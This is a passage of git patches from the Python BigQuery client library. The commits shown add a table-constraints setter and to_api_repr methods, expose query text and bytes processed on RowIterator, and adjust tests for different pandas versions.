+python-dateutil==2.8.2 +requests==2.21.0 +Shapely==1.8.4 +tqdm==4.7.4 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index a9e76d416..e65fca27e 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1222,7 +1222,12 @@ def test_list_rows_nullable_scalars_extreme_dtypes_w_custom_dtype( # These pandas dtypes are handled by the custom dtypes. assert df.dtypes["bool_col"].name == "boolean" - assert df.dtypes["float64_col"].name == "Float64" + # Result is dependent upon which version of pandas is being used. + # Float64 was not introduced until pandas version 1.4. + if PANDAS_INSTALLED_VERSION >= "1.4": + assert df.dtypes["float64_col"].name == "Float64" + else: + assert df.dtypes["float64_col"].name == "string" assert df.dtypes["int64_col"].name == "Int64" assert df.dtypes["string_col"].name == "string" diff --git a/tests/unit/job/test_copy.py b/tests/unit/job/test_copy.py index 4b0945310..8e2845316 100644 --- a/tests/unit/job/test_copy.py +++ b/tests/unit/job/test_copy.py @@ -147,7 +147,6 @@ def _verifyResourceProperties(self, job, resource): self._verifyReadonlyResourceProperties(job, resource) config = resource.get("configuration", {}).get("copy") - table_ref = config["destinationTable"] self.assertEqual(job.destination.project, table_ref["projectId"]) self.assertEqual(job.destination.dataset_id, table_ref["datasetId"]) diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 3a5d92dbd..2cda59bd1 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -645,6 +645,8 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): ) +# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 +# pragma added due to issues with coverage. @pytest.mark.skipif( pandas.__version__.startswith("2."), reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index fdd232a5c..48c085c1d 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -23,10 +23,7 @@ from unittest import mock import warnings -try: - import importlib.metadata as metadata -except ImportError: - import importlib_metadata as metadata +import importlib.metadata as metadata try: import pandas diff --git a/tests/unit/test__versions_helpers.py b/tests/unit/test__versions_helpers.py index b1d0ef1ac..8379c87c1 100644 --- a/tests/unit/test__versions_helpers.py +++ b/tests/unit/test__versions_helpers.py @@ -188,14 +188,19 @@ def test_bqstorage_is_read_session_optional_false(): @pytest.mark.skipif(pandas is None, reason="pandas is not installed") -@pytest.mark.parametrize("version", ["1.5.0", "2.0.0", "2.1.0"]) +@pytest.mark.parametrize("version", ["1.1.5", "2.0.0", "2.1.0"]) def test_try_import_raises_no_error_w_recent_pandas(version): + # Comparing against the minimum allowed pandas version. + # As long as the installed version is greater than that, no + # error is raised. versions = _versions_helpers.PandasVersions() with mock.patch("pandas.__version__", new=version): try: pandas = versions.try_import(raise_if_error=True) assert pandas is not None - except exceptions.LegacyPandasError: # pragma: NO COVER + # this exception should not fire unless there is something broken + # hence the pragma. + except exceptions.LegacyPandasError: # pragma: no cover raise ("Legacy error raised with a non-legacy dependency version.") diff --git a/tests/unit/test_legacy_types.py b/tests/unit/test_legacy_types.py index 809be1855..75f3e77d7 100644 --- a/tests/unit/test_legacy_types.py +++ b/tests/unit/test_legacy_types.py @@ -18,9 +18,9 @@ import warnings try: - import proto # type: ignore + import proto except ImportError: - proto = None + proto = None # type: ignore @pytest.mark.skipif(proto is None, reason="proto is not installed") diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index 73b29df6b..0f1e030cb 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -36,6 +36,7 @@ except ImportError: magics = None + bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") IPython = pytest.importorskip("IPython") interactiveshell = pytest.importorskip("IPython.terminal.interactiveshell") diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 1a3d7ec0f..7644186f3 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -16,7 +16,6 @@ import datetime import logging import re -from sys import version_info import time import types import unittest @@ -2171,10 +2170,11 @@ def test_to_geodataframe(self): df = row_iterator.to_geodataframe(create_bqstorage_client=False) self.assertIsInstance(df, geopandas.GeoDataFrame) self.assertEqual(len(df), 0) # verify the number of rows - if version_info.major == 3 and version_info.minor > 7: - assert not hasattr(df, "crs") # used with Python > 3.7 + + if geopandas.__version__ == "0.9.0": + assert hasattr(df, "crs") else: - self.assertIsNone(df.crs) # used with Python == 3.7 + assert not hasattr(df, "crs") class TestRowIterator(unittest.TestCase): @@ -3699,10 +3699,10 @@ def test_to_dataframe_no_tqdm_no_progress_bar(self): user_warnings = [ warning for warning in warned if warning.category is UserWarning ] - # With Python 3.7 and 3.8, len(user_warnings) = 3. With pandas < 1.5, - # pandas.ArrowDtype is not supported. We raise warnings because - # range columns have to be converted to object. - # With higher Python versions and noextra tests, len(user_warnings) = 0 + # With pandas < 1.5, pandas.ArrowDtype is not supported + # and len(user_warnings) = 3. + # We raise warnings because range columns have to be converted to object. + # With higher pandas versions and noextra tests, len(user_warnings) = 0 self.assertIn(len(user_warnings), [0, 3]) self.assertEqual(len(df), 4) @@ -3734,10 +3734,10 @@ def test_to_dataframe_no_tqdm(self): user_warnings = [ warning for warning in warned if warning.category is UserWarning ] - # With Python 3.7 and 3.8, len(user_warnings) = 4. With pandas < 1.5, - # pandas.ArrowDtype is not supported. We raise warnings because - # range columns have to be converted to object. - # With higher Python versions and noextra tests, len(user_warnings) = 1 + # With pandas < 1.5, pandas.ArrowDtype is not supported + # and len(user_warnings) = 4. + # We raise warnings because range columns have to be converted to object. + # With higher pandas versions and noextra tests, len(user_warnings) = 1 self.assertIn(len(user_warnings), [1, 4]) # Even though the progress bar won't show, downloading the dataframe @@ -3991,6 +3991,8 @@ def test_to_dataframe_w_dtypes_mapper(self): ) self.assertEqual(df.name.dtype.name, "string") + # While pyproject.toml lists pandas 1.1 as the lowest supported version of + # pandas, the pip resolver is not able to resolve pandas 1.1 and numpy if hasattr(pandas, "Float64Dtype"): self.assertEqual(list(df.miles), [1.77, 6.66, 2.0]) self.assertEqual(df.miles.dtype.name, "Float64") @@ -4085,7 +4087,6 @@ def test_to_dataframe_w_dtypes_mapper(self): {"start": None, "end": None}, ], ) - else: self.assertEqual( list(df.date), diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 02a7a6a79..9e42fb737 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -12,9 +12,9 @@ # See the License for the specific language governing permissions and # limitations under the License. +from unittest import mock import datetime import decimal -from unittest import mock import pytest @@ -34,12 +34,16 @@ def class_under_test(): return RowIterator +# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 +# pragma added due to issues with coverage. @pytest.mark.skipif( pandas.__version__.startswith("2."), reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", ) -def test_to_dataframe_nullable_scalars(monkeypatch, class_under_test): - # See tests/system/test_arrow.py for the actual types we get from the API. +def test_to_dataframe_nullable_scalars( + monkeypatch, class_under_test +): # pragma: NO COVER + """See tests/system/test_arrow.py for the actual types we get from the API.""" arrow_schema = pyarrow.schema( [ pyarrow.field("bignumeric_col", pyarrow.decimal256(76, scale=38)), @@ -129,12 +133,10 @@ def test_to_dataframe_nullable_scalars(monkeypatch, class_under_test): assert df["int64_col"][0] == -7 assert df["numeric_col"][0] == decimal.Decimal("-123.456789") assert df["string_col"][0] == "abcdefg" - # Pandas timedelta64 might be a better choice for pandas time columns. Then # they can more easily be combined with date columns to form datetimes. # https://github.com/googleapis/python-bigquery/issues/862 assert df["time_col"][0] == datetime.time(14, 21, 17, 123456) - assert df["timestamp_col"][0] == pandas.to_datetime("2021-08-09 13:30:44.123456Z") From f8572dd86595361bae82c3232b2c0d159690a7b7 Mon Sep 17 00:00:00 2001 From: Lkhagvadorj Sukhtsoodol Date: Tue, 4 Mar 2025 18:50:05 +0000 Subject: [PATCH 071/202] fix: adding property setter for table constraints, #1990 (#2092) * fix: adding property setter for table constraints, #1990 * fix: adding unit test for to_api_repr() method * fix: adding system test for bigquery table update * fix: adding more test case for table constraints property * fix: adding more test case for table constraints property * fix: linting code * fix: adding unit tests for test table, table constraint and foreign key * fix: linting based on noxfile * fix: linting based on noxfile * fix: adding unit tests and system test * fix: clearing lint error * fix: adding table constraint eq unit tests * fix: adding type to to_api_repr resource --- google/cloud/bigquery/table.py | 45 +++- tests/system/test_client.py | 77 ++++++ tests/unit/test_table.py | 442 +++++++++++++++++++++++++++++++++ 3 files changed, 562 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index e7f3c9a36..9950b1a53 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1058,6 +1058,17 @@ def table_constraints(self) -> Optional["TableConstraints"]: table_constraints = TableConstraints.from_api_repr(table_constraints) return table_constraints + @table_constraints.setter + def table_constraints(self, value): + """Tables Primary Key and Foreign Key information.""" + api_repr = value + if not isinstance(value, TableConstraints) and value is not None: + raise ValueError( + "value must be google.cloud.bigquery.table.TableConstraints or None" + ) + api_repr = value.to_api_repr() if value else None + self._properties[self._PROPERTY_TO_API_FIELD["table_constraints"]] = api_repr + @property def resource_tags(self): """Dict[str, str]: Resource tags for the table. @@ -1111,11 +1122,9 @@ def external_catalog_table_options( def foreign_type_info(self) -> Optional[_schema.ForeignTypeInfo]: """Optional. Specifies metadata of the foreign data type definition in field schema (TableFieldSchema.foreign_type_definition). - Returns: Optional[schema.ForeignTypeInfo]: Foreign type information, or :data:`None` if not set. - .. Note:: foreign_type_info is only required if you are referencing an external catalog such as a Hive table. @@ -3404,6 +3413,20 @@ def from_api_repr(cls, api_repr: Dict[str, Any]) -> "ForeignKey": ], ) + def to_api_repr(self) -> Dict[str, Any]: + """Return a dictionary representing this object.""" + return { + "name": self.name, + "referencedTable": self.referenced_table.to_api_repr(), + "columnReferences": [ + { + "referencingColumn": column_reference.referencing_column, + "referencedColumn": column_reference.referenced_column, + } + for column_reference in self.column_references + ], + } + class TableConstraints: """The TableConstraints defines the primary key and foreign key. @@ -3425,6 +3448,13 @@ def __init__( self.primary_key = primary_key self.foreign_keys = foreign_keys + def __eq__(self, other): + if not isinstance(other, TableConstraints) and other is not None: + raise TypeError("The value provided is not a BigQuery TableConstraints.") + return ( + self.primary_key == other.primary_key if other.primary_key else None + ) and (self.foreign_keys == other.foreign_keys if other.foreign_keys else None) + @classmethod def from_api_repr(cls, resource: Dict[str, Any]) -> "TableConstraints": """Create an instance from API representation.""" @@ -3440,6 +3470,17 @@ def from_api_repr(cls, resource: Dict[str, Any]) -> "TableConstraints": ] return cls(primary_key, foreign_keys) + def to_api_repr(self) -> Dict[str, Any]: + """Return a dictionary representing this object.""" + resource: Dict[str, Any] = {} + if self.primary_key: + resource["primaryKey"] = {"columns": self.primary_key.columns} + if self.foreign_keys: + resource["foreignKeys"] = [ + foreign_key.to_api_repr() for foreign_key in self.foreign_keys + ] + return resource + def _item_to_row(iterator, resource): """Convert a JSON row to the native object. diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 30e9f94a3..9df572b14 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -97,6 +97,10 @@ ], ), ] +TABLE_CONSTRAINTS_SCHEMA = [ + bigquery.SchemaField("id", "INTEGER", mode="REQUIRED"), + bigquery.SchemaField("fk_id", "STRING", mode="REQUIRED"), +] SOURCE_URIS_AVRO = [ "gs://cloud-samples-data/bigquery/federated-formats-reference-file-schema/a-twitter.avro", @@ -901,6 +905,79 @@ def test_update_table_clustering_configuration(self): table3 = Config.CLIENT.update_table(table2, ["clustering_fields"]) self.assertIsNone(table3.clustering_fields, None) + def test_update_table_constraints(self): + from google.cloud.bigquery.table import TableConstraints + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + dataset = self.temp_dataset(_make_dataset_id("update_table")) + + TABLE_NAME = "test_table" + table_arg = Table(dataset.table(TABLE_NAME), schema=TABLE_CONSTRAINTS_SCHEMA) + self.assertFalse(_table_exists(table_arg)) + + table = helpers.retry_403(Config.CLIENT.create_table)(table_arg) + self.to_delete.insert(0, table) + self.assertTrue(_table_exists(table)) + + REFERENCE_TABLE_NAME = "test_table2" + reference_table_arg = Table( + dataset.table(REFERENCE_TABLE_NAME), + schema=[ + bigquery.SchemaField("id", "INTEGER", mode="REQUIRED"), + ], + ) + reference_table = helpers.retry_403(Config.CLIENT.create_table)( + reference_table_arg + ) + self.to_delete.insert(0, reference_table) + self.assertTrue(_table_exists(reference_table)) + + reference_table.table_constraints = TableConstraints( + primary_key=PrimaryKey(columns=["id"]), foreign_keys=None + ) + reference_table2 = Config.CLIENT.update_table( + reference_table, ["table_constraints"] + ) + self.assertEqual( + reference_table2.table_constraints.primary_key, + reference_table.table_constraints.primary_key, + ) + + table_constraints = TableConstraints( + primary_key=PrimaryKey(columns=["id"]), + foreign_keys=[ + ForeignKey( + name="fk_id", + referenced_table=TableReference(dataset, "test_table2"), + column_references=[ + ColumnReference(referencing_column="id", referenced_column="id") + ], + ), + ], + ) + + table.table_constraints = table_constraints + table2 = Config.CLIENT.update_table(table, ["table_constraints"]) + self.assertEqual( + table2.table_constraints, + table_constraints, + ) + + table2.table_constraints = None + table3 = Config.CLIENT.update_table(table2, ["table_constraints"]) + self.assertIsNone(table3.table_constraints, None) + + reference_table2.table_constraints = None + reference_table3 = Config.CLIENT.update_table( + reference_table2, ["table_constraints"] + ) + self.assertIsNone(reference_table3.table_constraints, None) + @staticmethod def _fetch_single_page(table, selected_fields=None): iterator = Config.CLIENT.list_rows(table, selected_fields=selected_fields) diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 7644186f3..b846036ab 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -893,6 +893,158 @@ def test_table_constraints_property_getter(self): assert isinstance(table_constraints, TableConstraints) assert table_constraints.primary_key == PrimaryKey(columns=["id"]) + def test_table_constraints_property_setter(self): + from google.cloud.bigquery.table import ( + ColumnReference, + ForeignKey, + PrimaryKey, + TableConstraints, + TableReference, + ) + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + primary_key = PrimaryKey(columns=["id"]) + foreign_keys = [ + ForeignKey( + name="fk_name", + referenced_table=TableReference.from_string( + "my_project.my_dataset.table" + ), + column_references=[ + ColumnReference( + referenced_column="product_id", referencing_column="id" + ) + ], + ) + ] + table_constraints = TableConstraints( + primary_key=primary_key, foreign_keys=foreign_keys + ) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == { + "primaryKey": {"columns": ["id"]}, + "foreignKeys": [ + { + "name": "fk_name", + "referencedTable": { + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "table", + }, + "columnReferences": [ + {"referencedColumn": "product_id", "referencingColumn": "id"} + ], + } + ], + } + + def test_table_constraints_property_setter_empty_value(self): + from google.cloud.bigquery.table import TableConstraints + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table.table_constraints = TableConstraints(primary_key=None, foreign_keys=None) + assert table._properties["tableConstraints"] == {} + + def test_table_constraints_property_setter_invalid_value(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + with pytest.raises( + ValueError, + match="value must be google.cloud.bigquery.table.TableConstraints or None", + ): + table.table_constraints = "invalid_value" + + def test_table_constraints_property_setter_none_value(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table.table_constraints = None + assert table._properties["tableConstraints"] is None + + def test_table_constraints_property_setter_only_primary_key_set(self): + from google.cloud.bigquery.table import PrimaryKey, TableConstraints + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + primary_key = PrimaryKey(columns=["id"]) + + table_constraints = TableConstraints(primary_key=primary_key, foreign_keys=None) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == { + "primaryKey": {"columns": ["id"]} + } + + def test_table_constraints_property_setter_only_foriegn_keys(self): + from google.cloud.bigquery.table import ( + ColumnReference, + ForeignKey, + TableConstraints, + TableReference, + ) + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + foreign_keys = [ + ForeignKey( + name="fk_name", + referenced_table=TableReference.from_string( + "my_project.my_dataset.table" + ), + column_references=[ + ColumnReference( + referenced_column="product_id", referencing_column="id" + ) + ], + ) + ] + table_constraints = TableConstraints( + primary_key=None, foreign_keys=foreign_keys + ) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == { + "foreignKeys": [ + { + "name": "fk_name", + "referencedTable": { + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "table", + }, + "columnReferences": [ + {"referencedColumn": "product_id", "referencingColumn": "id"} + ], + } + ] + } + + def test_table_constraints_property_setter_empty_constraints(self): + from google.cloud.bigquery.table import TableConstraints + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table_constraints = TableConstraints(primary_key=None, foreign_keys=None) + table.table_constraints = table_constraints + + assert table._properties["tableConstraints"] == {} + def test_description_setter_bad_value(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) @@ -5889,6 +6041,48 @@ def test__eq__other_type(self): with self.assertRaises(TypeError): foreign_key == "This is not a Foreign Key" + def test_to_api_repr(self): + from google.cloud.bigquery.table import ColumnReference, TableReference + + name = "my_fk" + referenced_table = TableReference.from_string("my-project.mydataset.mytable") + column_references = [ + ColumnReference(referencing_column="product_id", referenced_column="id") + ] + foreign_key = self._make_one(name, referenced_table, column_references) + + expected = { + "name": name, + "referencedTable": { + "projectId": "my-project", + "datasetId": "mydataset", + "tableId": "mytable", + }, + "columnReferences": [ + {"referencingColumn": "product_id", "referencedColumn": "id"} + ], + } + self.assertEqual(foreign_key.to_api_repr(), expected) + + def test_to_api_repr_empty_column_references(self): + from google.cloud.bigquery.table import TableReference + + name = "my_fk" + referenced_table = TableReference.from_string("my-project.mydataset.mytable") + column_references = [] + foreign_key = self._make_one(name, referenced_table, column_references) + + expected = { + "name": name, + "referencedTable": { + "projectId": "my-project", + "datasetId": "mydataset", + "tableId": "mytable", + }, + "columnReferences": [], + } + self.assertEqual(foreign_key.to_api_repr(), expected) + class TestTableConstraint(unittest.TestCase): @staticmethod @@ -5906,6 +6100,144 @@ def test_constructor_defaults(self): self.assertIsNone(instance.primary_key) self.assertIsNone(instance.foreign_keys) + def test_constructor_explicit(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + primary_key = PrimaryKey(columns=["my_pk_id"]) + foriegn_keys = [ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference(referencing_column="id", referenced_column="id"), + ], + ), + ] + + table_constraint = self._make_one( + primary_key=primary_key, + foreign_keys=foriegn_keys, + ) + + self.assertEqual(table_constraint.primary_key, primary_key) + self.assertEqual(table_constraint.foreign_keys, foriegn_keys) + + def test_constructor_explicit_with_none(self): + table_constraint = self._make_one(primary_key=None, foreign_keys=None) + + self.assertIsNone(table_constraint.primary_key) + self.assertIsNone(table_constraint.foreign_keys) + + def test__eq__primary_key_mismatch(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + foriegn_keys = [ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference(referencing_column="id", referenced_column="id"), + ], + ), + ] + + table_constraint = self._make_one( + primary_key=PrimaryKey(columns=["my_pk_id"]), + foreign_keys=foriegn_keys, + ) + other_table_constraint = self._make_one( + primary_key=PrimaryKey(columns=["my_other_pk_id"]), + foreign_keys=foriegn_keys, + ) + + self.assertNotEqual(table_constraint, other_table_constraint) + + def test__eq__foreign_keys_mismatch(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + primary_key = PrimaryKey(columns=["my_pk_id"]) + + table_constraint = self._make_one( + primary_key=primary_key, + foreign_keys=[ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference( + referencing_column="id", referenced_column="id" + ), + ], + ), + ], + ) + other_table_constraint = self._make_one( + primary_key=primary_key, + foreign_keys=[ + ForeignKey( + name="my_other_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-other-table" + ), + column_references=[ + ColumnReference( + referencing_column="other_id", referenced_column="other_id" + ), + ], + ), + ], + ) + + self.assertNotEqual(table_constraint, other_table_constraint) + + def test__eq__other_type(self): + from google.cloud.bigquery.table import ( + PrimaryKey, + ForeignKey, + TableReference, + ColumnReference, + ) + + table_constraint = self._make_one( + primary_key=PrimaryKey(columns=["my_pk_id"]), + foreign_keys=[ + ForeignKey( + name="my_fk_id", + referenced_table=TableReference.from_string( + "my-project.my-dataset.my-table" + ), + column_references=[ + ColumnReference( + referencing_column="id", referenced_column="id" + ), + ], + ), + ], + ) + with self.assertRaises(TypeError): + table_constraint == "This is not a Table Constraint" + def test_from_api_repr_full_resource(self): from google.cloud.bigquery.table import ( ColumnReference, @@ -5985,6 +6317,116 @@ def test_from_api_repr_only_foreign_keys_resource(self): self.assertIsNone(instance.primary_key) self.assertIsNotNone(instance.foreign_keys) + def test_to_api_repr(self): + from google.cloud.bigquery.table import ColumnReference, ForeignKey, PrimaryKey + + primary_key = PrimaryKey(columns=["id", "product_id"]) + foreign_keys = [ + ForeignKey( + name="my_fk_name", + referenced_table=TableReference.from_string( + "my-project.my-dataset.products" + ), + column_references=[ + ColumnReference( + referencing_column="product_id", referenced_column="id" + ), + ], + ) + ] + instance = self._make_one(primary_key=primary_key, foreign_keys=foreign_keys) + + expected = { + "primaryKey": { + "columns": ["id", "product_id"], + }, + "foreignKeys": [ + { + "name": "my_fk_name", + "referencedTable": { + "projectId": "my-project", + "datasetId": "my-dataset", + "tableId": "products", + }, + "columnReferences": [ + {"referencingColumn": "product_id", "referencedColumn": "id"}, + ], + } + ], + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_only_primary_key(self): + from google.cloud.bigquery.table import PrimaryKey + + primary_key = PrimaryKey(columns=["id", "product_id"]) + instance = self._make_one(primary_key=primary_key, foreign_keys=None) + expected = { + "primaryKey": { + "columns": ["id", "product_id"], + }, + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_empty_primary_key(self): + from google.cloud.bigquery.table import PrimaryKey + + primary_key = PrimaryKey(columns=[]) + instance = self._make_one(primary_key=primary_key, foreign_keys=None) + + expected = { + "primaryKey": { + "columns": [], + }, + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_only_foreign_keys(self): + from google.cloud.bigquery.table import ColumnReference, ForeignKey + + foreign_keys = [ + ForeignKey( + name="my_fk_name", + referenced_table=TableReference.from_string( + "my-project.my-dataset.products" + ), + column_references=[ + ColumnReference( + referencing_column="product_id", referenced_column="id" + ), + ], + ) + ] + instance = self._make_one(primary_key=None, foreign_keys=foreign_keys) + expected = { + "foreignKeys": [ + { + "name": "my_fk_name", + "referencedTable": { + "projectId": "my-project", + "datasetId": "my-dataset", + "tableId": "products", + }, + "columnReferences": [ + {"referencingColumn": "product_id", "referencedColumn": "id"}, + ], + } + ], + } + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_empty_foreign_keys(self): + foreign_keys = [] + instance = self._make_one(primary_key=None, foreign_keys=foreign_keys) + + expected = {} + self.assertEqual(instance.to_api_repr(), expected) + + def test_to_api_repr_empty_constraints(self): + instance = self._make_one(primary_key=None, foreign_keys=None) + expected = {} + self.assertEqual(instance.to_api_repr(), expected) + class TestExternalCatalogTableOptions: PROJECT = "test-project" From 2d5f9320d7103bc64c7ba496ba54bb0ef52b5605 Mon Sep 17 00:00:00 2001 From: Huan Chen <142538604+Genesis929@users.noreply.github.com> Date: Fri, 7 Mar 2025 13:58:40 -0800 Subject: [PATCH 072/202] feat: add query text and total bytes processed to RowIterator (#2140) --- google/cloud/bigquery/_job_helpers.py | 2 ++ google/cloud/bigquery/client.py | 8 ++++++++ google/cloud/bigquery/job/query.py | 2 ++ google/cloud/bigquery/table.py | 18 ++++++++++++++++++ tests/unit/job/test_query.py | 3 +++ tests/unit/test_client.py | 3 +++ 6 files changed, 36 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index b028cd357..a8373c356 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -526,6 +526,8 @@ def do_query(): query_id=query_results.query_id, project=query_results.project, num_dml_affected_rows=query_results.num_dml_affected_rows, + query=query, + total_bytes_processed=query_results.total_bytes_processed, ) if job_retry is not None: diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 03ded93b1..8bbdd6c32 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4081,6 +4081,8 @@ def _list_rows_from_query_results( query_id: Optional[str] = None, first_page_response: Optional[Dict[str, Any]] = None, num_dml_affected_rows: Optional[int] = None, + query: Optional[str] = None, + total_bytes_processed: Optional[int] = None, ) -> RowIterator: """List the rows of a completed query. See @@ -4128,6 +4130,10 @@ def _list_rows_from_query_results( num_dml_affected_rows (Optional[int]): If this RowIterator is the result of a DML query, the number of rows that were affected. + query (Optional[str]): + The query text used. + total_bytes_processed (Optinal[int]): + total bytes processed from job statistics, if present. Returns: google.cloud.bigquery.table.RowIterator: @@ -4165,6 +4171,8 @@ def _list_rows_from_query_results( query_id=query_id, first_page_response=first_page_response, num_dml_affected_rows=num_dml_affected_rows, + query=query, + total_bytes_processed=total_bytes_processed, ) return row_iterator diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index ca2448eaa..a27c10530 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1741,6 +1741,8 @@ def is_job_done(): query_id=self.query_id, first_page_response=first_page_response, num_dml_affected_rows=self._query_results.num_dml_affected_rows, + query=self.query, + total_bytes_processed=self.total_bytes_processed, **list_rows_kwargs, ) rows._preserve_order = _contains_order_by(self.query) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 9950b1a53..4d79d60da 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1760,6 +1760,10 @@ class RowIterator(HTTPIterator): first_page_response (Optional[dict]): API response for the first page of results. These are returned when the first page is requested. + query (Optional[str]): + The query text used. + total_bytes_processed (Optinal[int]): + total bytes processed from job statistics, if present. """ def __init__( @@ -1781,6 +1785,8 @@ def __init__( query_id: Optional[str] = None, project: Optional[str] = None, num_dml_affected_rows: Optional[int] = None, + query: Optional[str] = None, + total_bytes_processed: Optional[int] = None, ): super(RowIterator, self).__init__( client, @@ -1808,6 +1814,8 @@ def __init__( self._query_id = query_id self._project = project self._num_dml_affected_rows = num_dml_affected_rows + self._query = query + self._total_bytes_processed = total_bytes_processed @property def _billing_project(self) -> Optional[str]: @@ -1855,6 +1863,16 @@ def query_id(self) -> Optional[str]: """ return self._query_id + @property + def query(self) -> Optional[str]: + """The query text used.""" + return self._query + + @property + def total_bytes_processed(self) -> Optional[int]: + """total bytes processed from job statistics, if present.""" + return self._total_bytes_processed + def _is_almost_completely_cached(self): """Check if all results are completely cached. diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 4bbd31c73..1df65279d 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -887,6 +887,7 @@ def test_result_reloads_job_state_until_done(self): } job_resource = self._make_resource(started=True, location="EU") job_resource_done = self._make_resource(started=True, ended=True, location="EU") + job_resource_done["statistics"]["query"]["totalBytesProcessed"] = str(1234) job_resource_done["configuration"]["query"]["destinationTable"] = { "projectId": "dest-project", "datasetId": "dest_dataset", @@ -966,6 +967,8 @@ def test_result_reloads_job_state_until_done(self): # Test that the total_rows property has changed during iteration, based # on the response from tabledata.list. self.assertEqual(result.total_rows, 1) + self.assertEqual(result.query, job.query) + self.assertEqual(result.total_bytes_processed, 1234) query_results_path = f"/projects/{self.PROJECT}/queries/{self.JOB_ID}" query_results_call = mock.call( diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 4f13d6ecc..34ef680dd 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5517,6 +5517,7 @@ def test_query_and_wait_defaults(self): "totalRows": "1", "rows": [{"f": [{"v": "5552452"}]}], "queryId": "job_abcDEF_", + "totalBytesProcessed": 1234, } creds = _make_credentials() http = object() @@ -5532,6 +5533,8 @@ def test_query_and_wait_defaults(self): self.assertIsNone(rows.job_id) self.assertIsNone(rows.project) self.assertIsNone(rows.location) + self.assertEqual(rows.query, query) + self.assertEqual(rows.total_bytes_processed, 1234) # Verify the request we send is to jobs.query. conn.api_request.assert_called_once() From faeb51d48dd9de9d2378db1898f770130d51887d Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Mon, 10 Mar 2025 11:02:52 -0400 Subject: [PATCH 073/202] chore: remove unused files 